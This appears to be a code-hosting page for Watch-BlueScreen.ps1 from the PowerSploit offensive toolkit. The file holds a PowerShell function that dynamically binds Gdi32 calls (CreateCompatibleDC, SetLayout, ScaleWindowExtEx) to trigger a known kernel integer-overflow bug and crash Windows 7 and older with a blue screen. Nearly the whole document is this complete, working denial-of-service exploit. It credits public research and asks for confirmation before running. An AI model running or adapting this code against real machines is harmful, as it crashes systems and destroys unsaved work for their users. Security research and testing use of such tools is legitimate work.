Gh0st
/
PowerSploit
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
PowerSploit/CodeExecution/Watch-BlueScreen.ps1

78 lines
3.4 KiB
PowerShell
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

function Watch-BlueScreen
{
<#
.SYNOPSIS
Cause a blue screen to occur (Windows 7 and below).
PowerSploit Function: Watch-BlueScreen
Author: Matthew Graeber (@mattifestation)
Original Research: Tavis Ormandy and Nikita Tarakanov
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.NOTES
Tavis Ormandy documented this technique on 2/3/2013 and Nikita Tarakanov
tweeted this technique on 5/13/2013.
.LINK
https://gist.github.com/taviso/4658638
http://blog.cmpxchg8b.com/2013/02/the-other-integer-overflow.html
https://twitter.com/NTarakanov/status/334031968465453057
#>
[CmdletBinding( ConfirmImpact = 'High')] Param ()
try { $Gdi32 = [Gdi32] } catch [Management.Automation.RuntimeException]
{
$DynAssembly = New-Object System.Reflection.AssemblyName('BSOD')
$AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, 'Run')
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('BSOD', $False)
$TypeBuilder = $ModuleBuilder.DefineType('Gdi32', 'Public, Class')
$DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
$SetLastError = [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError')
$SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder( $DllImportConstructor, @('ntdll.dll'),
[Reflection.FieldInfo[]]@($SetLastError), @($true))
$TypeBuilder.DefinePInvokeMethod( 'CreateCompatibleDC',
'Gdi32.dll',
'Public, Static',
'Standard',
[IntPtr],
@([IntPtr]),
'Winapi',
'Auto' ).SetCustomAttribute($SetLastErrorCustomAttribute)
$TypeBuilder.DefinePInvokeMethod( 'SetLayout',
'Gdi32.dll',
'Public, Static',
'Standard',
[UInt32],
@([IntPtr], [UInt32]),
'Winapi',
'Auto' ) | Out-Null
$TypeBuilder.DefinePInvokeMethod( 'ScaleWindowExtEx',
'Gdi32.dll',
'Public, Static',
'Standard',
[Bool],
@([IntPtr], [Int32], [Int32], [Int32], [Int32], [IntPtr]),
'Winapi',
'Auto' ) | Out-Null
$Gdi32 = $TypeBuilder.CreateType()
}
$LAYOUT_RTL = 1
if ($psCmdlet.ShouldContinue( 'Do you want to continue?', 'You may want to save your work before continuing.' ))
{
$DC = $Gdi32::CreateCompatibleDC([IntPtr]::Zero)
$Gdi32::SetLayout($DC, $LAYOUT_RTL) | Out-Null
$Gdi32::ScaleWindowExtEx($DC, [Int32]::MinValue, -1, 1, 1, [IntPtr]::Zero) | Out-Null
}
}
Reference in New Issue View Git Blame Copy Permalink